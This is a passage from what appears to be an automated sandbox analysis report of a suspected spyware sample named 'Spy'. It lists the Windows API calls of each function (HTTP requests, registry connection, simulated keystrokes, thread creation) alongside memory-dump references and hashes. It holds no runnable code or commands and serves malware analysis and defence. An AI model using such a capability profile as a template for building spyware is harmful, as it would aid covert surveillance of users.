                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AF21AC
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00AF21DC
                                                      • InternetCloseHandle.WININET(00000000), ref: 00AF2223
                                                        • Part of subcall function 00AF2B4F: GetLastError.KERNEL32(?,?,00AF1EE3,00000000,00000000,00000001), ref: 00AF2B64
                                                        • Part of subcall function 00AF2B4F: SetEvent.KERNEL32(?,?,00AF1EE3,00000000,00000000,00000001), ref: 00AF2B79
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                      • String ID:
                                                      • API String ID: 2603140658-3916222277
                                                      • Opcode ID: b77c7316d46fab3e764da8172b05c94a4a6819293e66561791fbfce1e479d355
                                                      • Instruction ID: f3e1b34890df35ad5364f00a2b06d4fd5855cdc4cd012026eebe75ddf55561e4
                                                      • Opcode Fuzzy Hash: b77c7316d46fab3e764da8172b05c94a4a6819293e66561791fbfce1e479d355
                                                      • Instruction Fuzzy Hash: F1415DB150121CBFEB129F90CC89FFB7BACEF08354F108116FA059A195DBB09E459BA5
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B10980), ref: 00AF9412
                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B10980), ref: 00AF9446
                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AF95C0
                                                      • SysFreeString.OLEAUT32(?), ref: 00AF95EA
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                      • String ID:
                                                      • API String ID: 560350794-0
                                                      • Opcode ID: f31979dedcc976b43ef01190887b1452df539ad98a61624d28a4599cc4d14679
                                                      • Instruction ID: afb0fce362716a52ec54aa7f5dce5a1c67cd60de56df3b29e2a76db9242eaee8
                                                      • Opcode Fuzzy Hash: f31979dedcc976b43ef01190887b1452df539ad98a61624d28a4599cc4d14679
                                                      • Instruction Fuzzy Hash: 25F12B71A00219EFDB15EF94C884EBEB7B9FF49315F108158FA06AB261DB31AE45CB50
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B08D24
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: 4b485447003d344c02117d690c30a3de71466c06a817b9c574b2f4f7c79b2ff6
                                                      • Instruction ID: fd92ffadbe74dda781c8b52993d75b3f925b655a19769331e040901af5bd9e93
                                                      • Opcode Fuzzy Hash: 4b485447003d344c02117d690c30a3de71466c06a817b9c574b2f4f7c79b2ff6
                                                      • Instruction Fuzzy Hash: 55519D30640204BFEB30AB24DC89BA93FE4EB15350F6446A5F595EB1E1CF71AA90DB60
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00ABC638
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ABC65A
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00ABC672
                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00ABC690
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00ABC6B1
                                                      • DestroyIcon.USER32(00000000), ref: 00ABC6C0
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00ABC6DD
                                                      • DestroyIcon.USER32(?), ref: 00ABC6EC
                                                        • Part of subcall function 00B0AAD4: DeleteObject.GDI32(00000000), ref: 00B0AB0D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                      • String ID:
                                                      • API String ID: 2819616528-0
                                                      • Opcode ID: d06c0561eda8701d820fb30043e420eeea572904e7689145943900ff2cef0e9a
                                                      • Instruction ID: 58ada71db408987c1d74797496b2e85620f89e8c3e5f0f1ee8f1cf0ffba1eebd
                                                      • Opcode Fuzzy Hash: d06c0561eda8701d820fb30043e420eeea572904e7689145943900ff2cef0e9a
                                                      • Instruction Fuzzy Hash: EA516974610209AFDB20EF25CD55FBA7BB9FB58720F104528F942D7290DBB0ADA0DB50
                                                      APIs
                                                        • Part of subcall function 00ADB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADB54D
                                                        • Part of subcall function 00ADB52D: GetCurrentThreadId.KERNEL32 ref: 00ADB554
                                                        • Part of subcall function 00ADB52D: AttachThreadInput.USER32(00000000,?,00ADA23B,?,00000001), ref: 00ADB55B
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ADA246
                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00ADA263
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00ADA266
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ADA26F
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00ADA28D
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ADA290
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ADA299
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00ADA2B0
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ADA2B3
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      • String ID:
                                                      • API String ID: 2014098862-0
                                                      • Opcode ID: 690a08fb50f7bcbdcab9f1e7a55296501c1deeae27f41284074409d41dec15f7
                                                      • Instruction ID: 08b532ea57f0d8a698d811d3734d2de27cde7e310e6cd4b1c9975ff6f53cb84a
                                                      • Opcode Fuzzy Hash: 690a08fb50f7bcbdcab9f1e7a55296501c1deeae27f41284074409d41dec15f7
                                                      • Instruction Fuzzy Hash: 0211E5B1560218BEF6106F619C49FAA3B2DEB4C750F514416F3416B1D0CEF35CA09AB0
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00AD915A,00000B00,?,?), ref: 00AD94E2
                                                      • HeapAlloc.KERNEL32(00000000,?,00AD915A,00000B00,?,?), ref: 00AD94E9
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AD915A,00000B00,?,?), ref: 00AD94FE
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00AD915A,00000B00,?,?), ref: 00AD9506
                                                      • DuplicateHandle.KERNEL32(00000000,?,00AD915A,00000B00,?,?), ref: 00AD9509
                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00AD915A,00000B00,?,?), ref: 00AD9519
                                                      • GetCurrentProcess.KERNEL32(00AD915A,00000000,?,00AD915A,00000B00,?,?), ref: 00AD9521
                                                      • DuplicateHandle.KERNEL32(00000000,?,00AD915A,00000B00,?,?), ref: 00AD9524
                                                      • CreateThread.KERNEL32(00000000,00000000,00AD954A,00000000,00000000,00000000), ref: 00AD953E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: b78b08f7e164e246164e6d6c7fcfce47170e74939587621da82640b5106aacfe
                                                      • Instruction ID: d456d717ab0480b24aa64196a63620ab91005d3844a10b90fcebc4ee7ce179a4
                                                      • Opcode Fuzzy Hash: b78b08f7e164e246164e6d6c7fcfce47170e74939587621da82640b5106aacfe
                                                      • Instruction Fuzzy Hash: 4D01C2B5250304BFE710AF65DC4DFA77B6CEB89711F408411FA05DB191CEB59854CB60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      • API String ID: 0-572801152
                                                      • Opcode ID: 0671ddde40db582e70fc76bd7fc14e592c7f490dad2f1ebbecad7dc2e973ca5c
                                                      • Instruction ID: 634605a488adac29df9a6cfa4bb66736dff66e0a4b3bd08137e597dcacb0260d
                                                      • Opcode Fuzzy Hash: 0671ddde40db582e70fc76bd7fc14e592c7f490dad2f1ebbecad7dc2e973ca5c
                                                      • Instruction Fuzzy Hash: 7DC190B1A0021E9FDF10DF98C884AFEB7F5BB58350F148569FA09AB280E770AD45CB51
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$_memset
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2862541840-625585964
                                                      • Opcode ID: 21390e3c69688222603d9723b87a70a5c1fbae96eca3c7b563d0fcc617b4f312
                                                      • Instruction ID: 2a3bfe6b14dace3bce451bd912604f5ce61b25a3ea672288652ff615b7a62bd6
                                                      • Opcode Fuzzy Hash: 21390e3c69688222603d9723b87a70a5c1fbae96eca3c7b563d0fcc617b4f312
                                                      • Instruction Fuzzy Hash: C391AC31A00219ABDF24DFA5C884FAFBBB8EF85750F10855DF615AB290DB709945CFA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B07449
                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B0745D
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B07477
                                                      • _wcscat.LIBCMT ref: 00B074D2
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B074E9
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B07517
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcscat
                                                      • String ID: SysListView32
                                                      • API String ID: 307300125-78025650
                                                      • Opcode ID: 89a5db65e923cd1b715dfb8aacfa14c0414939bbc86f821612e6d3c81b69fd8f
                                                      • Instruction ID: 2a5752e40e3a375cd9656a09592df6612962578673488ea59cc66b76a78bd75c
                                                      • Opcode Fuzzy Hash: 89a5db65e923cd1b715dfb8aacfa14c0414939bbc86f821612e6d3c81b69fd8f
                                                      • Instruction Fuzzy Hash: BC418471944348AFEB219F64CC85BEEBBE8EF08350F10446AF945A72D1DB71AD84CB50
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00AE357C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: 6c9fc1abf218faf4cd2d1aac0b00ca5464b48f8054779ae154a0aa9662311bdd
                                                      • Instruction ID: f7c4e2fd1aa69250ed085d11a0a2e951c707f667be0367bef04f72761a4595d6
                                                      • Opcode Fuzzy Hash: 6c9fc1abf218faf4cd2d1aac0b00ca5464b48f8054779ae154a0aa9662311bdd
                                                      • Instruction Fuzzy Hash: 4B11E773648786BEAF005B56DC96CAA77ECDF06760F20046AFA00A73C1E7A46F4056B0
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00AE4802
                                                      • LoadStringW.USER32(00000000), ref: 00AE4809
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AE481F
                                                      • LoadStringW.USER32(00000000), ref: 00AE4826
                                                      • _wprintf.LIBCMT ref: 00AE484C
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AE486A
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00AE4847
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 3648134473-3128320259
                                                      • Opcode ID: 91d75ab74b27f6dff3814e9af40e5b1f4da573ec480bed941b8481197d9fc558
                                                      • Instruction ID: 62f393965025b3bd26939ad8c7908ccfc71a3fae6e147a3947150712403a0726
                                                      • Opcode Fuzzy Hash: 91d75ab74b27f6dff3814e9af40e5b1f4da573ec480bed941b8481197d9fc558
                                                      • Instruction Fuzzy Hash: CB0162F29102487FE711ABA49D89EF6737CEB08301F804595B749E3041EEB49ED44B75
                                                      APIs
                                                        • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                      • GetSystemMetrics.USER32(0000000F), ref: 00B0DB42
                                                      • GetSystemMetrics.USER32(0000000F), ref: 00B0DB62
                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B0DD9D
                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B0DDBB
                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B0DDDC
                                                      • ShowWindow.USER32(00000003,00000000), ref: 00B0DDFB
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00B0DE20
                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00B0DE43
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                      • String ID:
                                                      • API String ID: 1211466189-0
                                                      • Opcode ID: c5fcf92fa0b62be7b45513c7dc9c20860bdb5db7158ea4cd716632fea54b0bd4
                                                      • Instruction ID: 11abe4f4336f659226568049e7d6364c9905a41e4a96e80e1878c5dd31315c58
                                                      • Opcode Fuzzy Hash: c5fcf92fa0b62be7b45513c7dc9c20860bdb5db7158ea4cd716632fea54b0bd4
                                                      • Instruction Fuzzy Hash: 59B15731600215ABDF14CFA9C9C57A97BF1FF44711F0881A9EC489F2D5DB75A990CB90
                                                      APIs
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                        • Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0044E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: BuffCharConnectRegistryUpper_memmove
                                                      • String ID:
                                                      • API String ID: 3479070676-0
                                                      • Opcode ID: eeca22fb75758fa5bf3075cec5eb761019f1703ed4973df6bd6a74daa77f2526
                                                      • Instruction ID: 496e6432a89ac6b0507727335a6706db3aac23b0aa4a2ea9a26bb2e0b3c77c7d
                                                      • Opcode Fuzzy Hash: eeca22fb75758fa5bf3075cec5eb761019f1703ed4973df6bd6a74daa77f2526
                                                      • Instruction Fuzzy Hash: DAA18A30208201DFCB15EF64C885B6EBBE5EF88314F14895DF9969B2A2DB31E945CF42
                                                      APIs
                                                        • Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BE0
                                                        • Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BF9
                                                        • Part of subcall function 00AE4FEC: GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00AE52FB
                                                      • _wcscmp.LIBCMT ref: 00AE5315
                                                      • MoveFileW.KERNEL32(?,?), ref: 00AE5330
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                      • String ID:
                                                      • API String ID: 793581249-0
                                                      • Opcode ID: db94134c6f2979e76a1f3f4b333ca3190144b83ebf3f8186c0f914f30dadd11f
                                                      • Instruction ID: 0f8ceed797422cda88fcb1f5d197956fbc519d2da0b63cc4228659406911557c
                                                      • Opcode Fuzzy Hash: db94134c6f2979e76a1f3f4b333ca3190144b83ebf3f8186c0f914f30dadd11f
                                                      • Instruction Fuzzy Hash: C55185B24083859BC724EBA5D9819DFB3EC9F85340F50491EF289C7192EF74E688C756
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000), ref: 00A82E9F
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000,000000FF), ref: 00A82EE7
                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000), ref: 00ABC55B
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000), ref: 00ABC5C7
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: 0c8633cd75e6db4fba437664f5a3ee0f33addd9f08850413a662b3057ce02c18
                                                      • Instruction ID: 65ac86f134413c2a040586d33fc693631744a20c25408288b90fb1484eb254d1
                                                      • Opcode Fuzzy Hash: 0c8633cd75e6db4fba437664f5a3ee0f33addd9f08850413a662b3057ce02c18
                                                      • Instruction Fuzzy Hash: AA412970618680AEDB35BB28CC88BBA7FE6BF91310F64891DE447575A1CB71B980DB14
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00AE7698
                                                        • Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
                                                        • Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00AE76CF
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00AE76EB
